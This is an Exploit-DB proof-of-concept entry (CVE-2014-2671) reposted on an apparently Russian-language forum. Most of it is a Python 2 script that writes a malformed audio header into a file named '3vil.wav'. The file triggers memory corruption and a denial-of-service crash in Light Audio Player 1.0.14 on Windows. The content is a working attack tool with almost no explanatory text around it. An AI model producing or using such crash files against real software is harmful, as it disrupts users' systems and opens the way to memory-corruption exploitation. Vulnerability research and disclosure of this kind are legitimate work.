- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32481
- Проверка EDB
-
- Пройдено
- Автор
- TUNISIAN CYBER
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2014-2671
- Дата публикации
- 2014-03-24
Код:
#!/usr/bin/python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
import os
os.system("color 02")
print"###########################################################"
print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #"
print"# Author: TUNISIAN CYBER #"
print"# Category: DoS/PoC # "
print"###########################################################"
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
filename = "3vil.wav"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()
- Источник
- www.exploit-db.com